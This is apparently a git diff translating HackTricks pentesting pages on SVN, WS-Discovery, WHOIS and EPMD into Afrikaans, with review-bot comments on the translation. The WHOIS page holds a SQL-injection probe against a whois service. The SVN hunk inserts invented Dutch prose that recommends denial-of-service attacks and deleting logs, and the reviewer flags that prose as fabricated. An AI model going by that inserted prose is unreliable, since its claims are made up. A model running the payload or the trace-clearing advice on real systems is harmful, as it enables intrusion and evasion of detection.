geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**offisiële PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
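Review bot: the Shodan line `+_Ek dink nie Shodan detect hierdie diens nie._` leaves the English verb untranslated; use "bespeur" or "opspoor" ("Ek dink nie Shodan bespeur hierdie diens nie."). In the Basic Information paragraph, "compilation tasks" becomes the singular `sy **kompilasietaak**`; make it "kompilasietake". The exploitation block, which puts a Metasploit console line and an nmap command in one fence, is unchanged from the source, so nothing to do there in this patch.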
- - diff --git a/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 6ee12588c..a98414548 100644 --- a/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ b/network-services-pentesting/3690-pentesting-subversion-svn-server.md @@ -1,59 +1,102 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently. - -**Default port:** 3690 +**Subversion** is 'n gesentraliseerde **weergawebeheerstelsel** wat 'n kritieke rol speel in die bestuur van beide die huidige en historiese data van projekte. As 'n **open source**-hulpmiddel, werk dit onder die **Apache-lisensie**. Hierdie stelsel word wyd erken vir sy vermoëns in **sagteware-weergawebeheer en hersieningsbeheer**, wat verseker dat gebruikers veranderinge oor tyd doeltreffend kan opvolg. +**Verstekpoort:** 3690 ``` PORT STATE SERVICE 3690/tcp open svnserve Subversion ``` +## Banner Gaping -## Banner Grabbing +Banner gaping is 'n tegniek wat gebruik word om inligting oor 'n Subversion (SVN) bediener te bekom deur die banner te ondersoek wat deur die bediener tydens die verbinding gestuur word. Die banner is 'n stuk teks wat in die begin van die verbinding gestuur word en dikwels inligting soos die bediener se weergawe en ander relevante inligting bevat. +Om banner gaping uit te voer, kan jy 'n netwerk skandering hulpmiddel soos Nmap gebruik om die bediener se poorte te skandeer en die inligting in die banners te ontleed. Jy kan ook 'n eenvoudige TCP-verbinding gebruik om die banner handmatig te ondersoek. + +Die inligting wat jy uit die banner kan verkry, kan nuttig wees vir verdere aanvalle en penetrasietoetse. Dit kan jou help om die bediener se weergawe te bepaal en moontlike kwesbaarhede te identifiseer wat jy kan uitbuit. + +Dit is belangrik om te onthou dat banner gaping 'n pasiewe tegniek is en nie die bediener self aanval nie. 
Dit is 'n nuttige stap in die verkenningsfase van 'n penetrasietoets, maar dit moet met ander tegnieke en hulpmiddels gekombineer word om 'n volledige beeld van die bediener se veiligheid te verkry. ``` nc -vn 10.10.10.10 3690 ``` +## Opname -## Enumeration +Om een Subversion (SVN) server te pentesten, is het belangrijk om eerst een grondige opname uit te voeren. Dit omvat het identificeren van de serverversie, het verzamelen van informatie over de repository's en het identificeren van mogelijke kwetsbaarheden. +### Serverversie identificeren + +Om de serverversie van Subversion te identificeren, kunt u een HTTP-verzoek sturen naar de server en de respons controleren op de aanwezigheid van de "SVN" header. U kunt ook proberen verbinding te maken met de server via de SVN-client en de versie-informatie controleren die wordt weergegeven in de uitvoer. + +### Repository's identificeren + +Om de repository's op de Subversion-server te identificeren, kunt u een HTTP-verzoek sturen naar de server en de respons controleren op de aanwezigheid van de "Location" header. U kunt ook proberen verbinding te maken met de server via de SVN-client en de lijst met beschikbare repository's controleren. + +### Kwetsbaarheden identificeren + +Om mogelijke kwetsbaarheden op de Subversion-server te identificeren, kunt u de serverconfiguratie controleren op bekende beveiligingslekken. U kunt ook zoeken naar bekende kwetsbaarheden in de specifieke versie van Subversion die wordt gebruikt door de server. Het is ook belangrijk om te controleren of de server correct is geconfigureerd en of er geen onbeveiligde toegangspunten zijn. + +## Exploitation + +Na het uitvoeren van een grondige opname, kunt u overgaan tot het exploiteren van kwetsbaarheden op de Subversion-server. Dit kan het uitvoeren van aanvallen omvatten, zoals het verkrijgen van ongeautoriseerde toegang tot de repository's, het verkrijgen van gevoelige informatie of het uitvoeren van denial-of-service (DoS) aanvallen. 
+ +### Ongeautoriseerde toegang tot repository's verkrijgen + +Om ongeautoriseerde toegang tot repository's te verkrijgen, kunt u proberen zwakke of standaard inloggegevens te raden. U kunt ook proberen gebruik te maken van bekende beveiligingslekken in de Subversion-server om toegang te krijgen tot de repository's zonder geldige referenties. + +### Gevoelige informatie verkrijgen + +Om gevoelige informatie te verkrijgen, kunt u proberen toegang te krijgen tot de repository's en de inhoud ervan te doorzoeken op vertrouwelijke gegevens. U kunt ook proberen toegang te krijgen tot de serverconfiguratiebestanden om gevoelige informatie zoals wachtwoorden of certificaten te verkrijgen. + +### Denial-of-Service (DoS) aanvallen uitvoeren + +Om een denial-of-service (DoS) aanval uit te voeren, kunt u proberen de Subversion-server te overbelasten door een groot aantal verzoeken te sturen of door specifieke kwetsbaarheden in de server te misbruiken. Dit kan resulteren in het onbeschikbaar maken van de server voor legitieme gebruikers. + +## Post-Exploitation + +Na een succesvolle exploitatie van kwetsbaarheden op de Subversion-server, kunt u overgaan tot post-exploitatieactiviteiten. Dit omvat het verkennen van de repository's, het verkrijgen van verdere toegang tot het systeem en het opruimen van sporen om detectie te voorkomen. + +### Repository's verkennen + +Om de repository's verder te verkennen, kunt u de inhoud ervan doorzoeken op interessante bestanden of gevoelige informatie. U kunt ook proberen toegang te krijgen tot andere repository's die mogelijk aanwezig zijn op het systeem. + +### Verdere toegang tot het systeem verkrijgen + +Om verdere toegang tot het systeem te verkrijgen, kunt u proberen andere kwetsbaarheden in het systeem te misbruiken of gebruik te maken van de verkregen toegang tot de repository's om toegang te krijgen tot andere delen van het systeem. 
+ +### Sporen opruimen + +Om detectie te voorkomen, is het belangrijk om sporen van uw activiteiten op de Subversion-server te verwijderen. Dit kan het verwijderen van logbestanden, het herstellen van gewijzigde bestanden of het terugzetten van de serverconfiguratie naar de oorspronkelijke staat omvatten. ```bash svn ls svn://10.10.10.203 #list svn log svn://10.10.10.203 #Commit history svn checkout svn://10.10.10.203 #Download the repository svn up -r 2 #Go to revision 2 inside the checkout folder ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
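Review bot: this hunk (`@@ -1,59 +1,102 @@`) does far more than translate: the source only has the headings `## Banner Grabbing` and `## Enumeration` above two command blocks, but the patch adds roughly forty lines of new prose that exist nowhere in the English page, starting at `+Banner gaping is 'n tegniek wat gebruik word om inligting oor 'n Subversion (SVN) bediener te bekom` and continuing from `+Om een Subversion (SVN) server te pentesten, is het belangrijk om eerst een grondige opname uit te voeren.` The second part is in Dutch, not Afrikaans ("kunt u", "U kunt ook proberen", "inloggegevens"), and its content is unsupported filler: it asserts an "SVN" HTTP header for version detection and a "Location" header for listing repositories, recommends denial-of-service attacks, and adds a "Sporen opruimen" (clearing traces) section, none of which the source page states. Because the insert ends immediately before the ```` ```bash ```` block, the genuine `svn ls` / `svn log` / `svn checkout` commands now appear under the fabricated "### Sporen opruimen" heading. Drop everything between the two headings and the fence, and translate only the headings themselves; note that "Banner Gaping" does not mean banner grabbing ("gaping" is a yawn), so keep "Banner Grabbing" untouched or use "Banier-onderskepping", and use "Enumerasie" rather than "Opname" to match the other pages in this patch.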
- - diff --git a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md index f48dc7503..f309cce9c 100644 --- a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md +++ b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md @@ -1,30 +1,27 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Basic Information +# Basiese Inligting -The **Web Services Dynamic Discovery Protocol (WS-Discovery)** is identified as a protocol designed for the discovery of services within a local network through multicast. It facilitates the interaction between **Target Services** and **Clients**. Target Services are endpoints available for discovery, while Clients are the ones actively searching for these services. Communication is established using **SOAP queries over UDP**, directed to the multicast address **239.255.255.250** and UDP port **3702**. +Die **Web Services Dynamic Discovery Protocol (WS-Discovery)** word geïdentifiseer as 'n protokol wat ontwerp is vir die ontdekking van dienste binne 'n plaaslike netwerk deur middel van multicast. Dit fasiliteer die interaksie tussen **Target Services** en **Clients**. Target Services is eindpunte wat beskikbaar is vir ontdekking, terwyl Clients aktief soek na hierdie dienste. Kommunikasie word tot stand gebring deur **SOAP-navrae oor UDP**, gerig aan die multicast-adres **239.255.255.250** en UDP-poort **3702**. -Upon joining a network, a Target Service announces its presence by broadcasting a **multicast Hello**. It remains open to receiving **multicast Probes** from Clients that are on the lookout for services by Type, an identifier unique to the endpoint (e.g., **NetworkVideoTransmitter** for an IP camera). In response to a matching Probe, a Target Service may send a **unicast Probe Match**. Similarly, a Target Service could receive a **multicast Resolve** aimed at identifying a service by name, to which it may reply with a **unicast Resolve Match** if it is the intended target. In the event of leaving the network, a Target Service attempts to broadcast a **multicast Bye**, signaling its departure. +By die aansluiting by 'n netwerk, kondig 'n Target Service sy teenwoordigheid aan deur 'n **multicast Hello** uit te saai. 
Dit bly oop vir die ontvangs van **multicast Probes** van Clients wat op soek is na dienste volgens Tipe, 'n unieke identifiseerder vir die eindpunt (bv. **NetworkVideoTransmitter** vir 'n IP-kamera). In reaksie op 'n ooreenstemmende Probe kan 'n Target Service 'n **unicast Probe Match** stuur. Op dieselfde manier kan 'n Target Service 'n **multicast Resolve** ontvang wat daarop gemik is om 'n diens volgens naam te identifiseer, waarop dit kan antwoord met 'n **unicast Resolve Match** as dit die bedoelde teiken is. In die geval van die verlaat van die netwerk, probeer 'n Target Service 'n **multicast Bye** uitsaai om sy vertrek aan te dui. ![](<../.gitbook/assets/image (633).png>) -**Default port**: 3702 - +**Verstekpoort**: 3702 ``` PORT STATE SERVICE 3702/udp open|filtered unknown @@ -34,20 +31,16 @@ PORT STATE SERVICE | Address: http://10.0.200.116:50000 |_ Type: Device wprt:PrintDeviceType ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
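Review bot: the header and footer banners in this file are translated differently although they are the same text in the English source: the top banner ends with "hacking-truuks" and "github-opslag", the bottom one with "GitHub-opslagplekke", and the subscription bullet is worded two ways ("jou **maatskappy geadverteer wil sien**" vs "wil sien dat jou **maatskappy geadverteer word**"). This banner is repeated in every page of the repository, so translate it once and reuse the identical string; the same drift appears in the other files of this patch. Separately, both hunks drop the blank lines around the fenced block (between `**Verstekpoort**: 3702` and the opening ``` fence, and after the closing fence); those removals are not translation changes and only inflate the diff, so keep the original layout.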
- - diff --git a/network-services-pentesting/43-pentesting-whois.md b/network-services-pentesting/43-pentesting-whois.md index 5eff2164e..daedd8523 100644 --- a/network-services-pentesting/43-pentesting-whois.md +++ b/network-services-pentesting/43-pentesting-whois.md @@ -1,85 +1,74 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -The **WHOIS** protocol serves as a standard method for **inquiring about the registrants or holders of various Internet resources** through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. - -**Default port:** 43 +Die **WHOIS**-protokol dien as 'n standaardmetode om **navraag te doen oor die registrante of houers van verskillende internetbronne** deur spesifieke databasisse. Hierdie bronne sluit domeinname, blokke van IP-adresse en outonome stelsels in, onder andere. Buiten hierdie bronne vind die protokol toepassing in die toegang tot 'n breër spektrum van inligting. +**Verstekpoort:** 43 ``` PORT STATE SERVICE 43/tcp open whois? ``` +# Enumereer -# Enumerate - -Get all the information that a whois service has about a domain: - +Kry alle inligting wat 'n whois-diens oor 'n domein het: ```bash whois -h -p "domain.tld" echo "domain.ltd" | nc -vn ``` - -Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response: +Let daarop dat wanneer jy vir inligting vra by 'n WHOIS-diens, die gebruikte databasis in die antwoord verskyn: ![](<../.gitbook/assets/image (147).png>) -Also, the WHOIS service always needs to use a **database** to store and extract the information. So, a possible **SQLInjection** could be present when **querying** the database from some information provided by the user. For example doing: `whois -h 10.10.10.155 -p 43 "a') or 1=1#"` you could be able to **extract all** the **information** saved in the database. +Die WHOIS-diens moet altyd 'n **databasis** gebruik om die inligting te stoor en te onttrek. Daarom kan 'n moontlike **SQLInjection** teenwoordig wees wanneer jy die databasis ondervra deur inligting wat deur die gebruiker verskaf word. 
Byvoorbeeld deur die volgende te doen: `whois -h 10.10.10.155 -p 43 "a') or 1=1#"` kan jy in staat wees om **alle** die **inligting** wat in die databasis gestoor is, te **onttrek**. # Shodan * `port:43 whois` -# HackTricks Automatic Commands - +# HackTricks Outomatiese Opdragte ``` Protocol_Name: WHOIS #Protocol Abbreviation if there is one. Port_Number: 43 #Comma separated if there is more than one. Protocol_Description: WHOIS #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for WHOIS - Note: | - The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. +Name: Notes +Description: Notes for WHOIS +Note: | +The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information. - https://book.hacktricks.xyz/pentesting/pentesting-smtp +https://book.hacktricks.xyz/pentesting/pentesting-smtp Entry_2: - Name: Banner Grab - Description: Grab WHOIS Banner - Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43 +Name: Banner Grab +Description: Grab WHOIS Banner +Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
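Review bot: the `HackTricks Automatic Commands` fenced block at the end of the hunk loses its indentation: `- Name: Notes`, `- Description: Notes for WHOIS` and `- Note: |` (with the indented note body and URL) become unindented `Name:`, `Description:` and `Note: |` lines, so the entries are no longer list items under `Entry_1` and `Entry_2`, and the block scalar introduced by `Note: |` no longer contains its body. Nothing inside a fenced block should change in a translation commit; restore those lines verbatim. Also, "Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response" becomes "Let daarop dat wanneer jy vir inligting vra by 'n WHOIS-diens, die gebruikte databasis in die antwoord verskyn", which drops "sometimes" and turns an occasional observation into a general claim; add "soms".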
- - diff --git a/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md index da8861ac1..0758428cd 100644 --- a/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md +++ b/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md @@ -1,37 +1,32 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Info +# Basiese Inligting -The **Erlang Port Mapper Daemon (epmd)** serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of **epmd** is crucial for the seamless interaction and communication between different Erlang nodes across a network. - -**Default port**: 4369 +Die **Erlang Port Mapper Daemon (epmd)** dien as 'n koördineerder vir verspreide Erlang-instansies. Dit is verantwoordelik vir die kartering van simboliese nodenaam na masjienadresse, en verseker dus dat elke nodenaam geassosieer word met 'n spesifieke adres. Hierdie rol van **epmd** is noodsaaklik vir die naadlose interaksie en kommunikasie tussen verskillende Erlang-nodes oor 'n netwerk. +**Verstekpoort**: 4369 ``` PORT STATE SERVICE VERSION 4369/tcp open epmd Erlang Port Mapper Daemon ``` +Hierdie word standaard gebruik op RabbitMQ en CouchDB installasies. -This is used by default on RabbitMQ and CouchDB installations. - -# Enumeration - -## Manual +# Opname +## Handleiding ```bash echo -n -e "\x00\x01\x6e" | nc -vn 4369 
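Review bot: `## Manual` is translated as `## Handleiding`, which means a handbook; here it is the hand-driven enumeration counterpart to `## Automatic` (rendered `## Outomaties` in the next hunk), so `## Handmatig` is the right word. Minor grammar in the same hunk: "Hierdie word standaard gebruik op RabbitMQ en CouchDB installasies" should read "Dit word standaard gebruik op RabbitMQ- en CouchDB-installasies".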
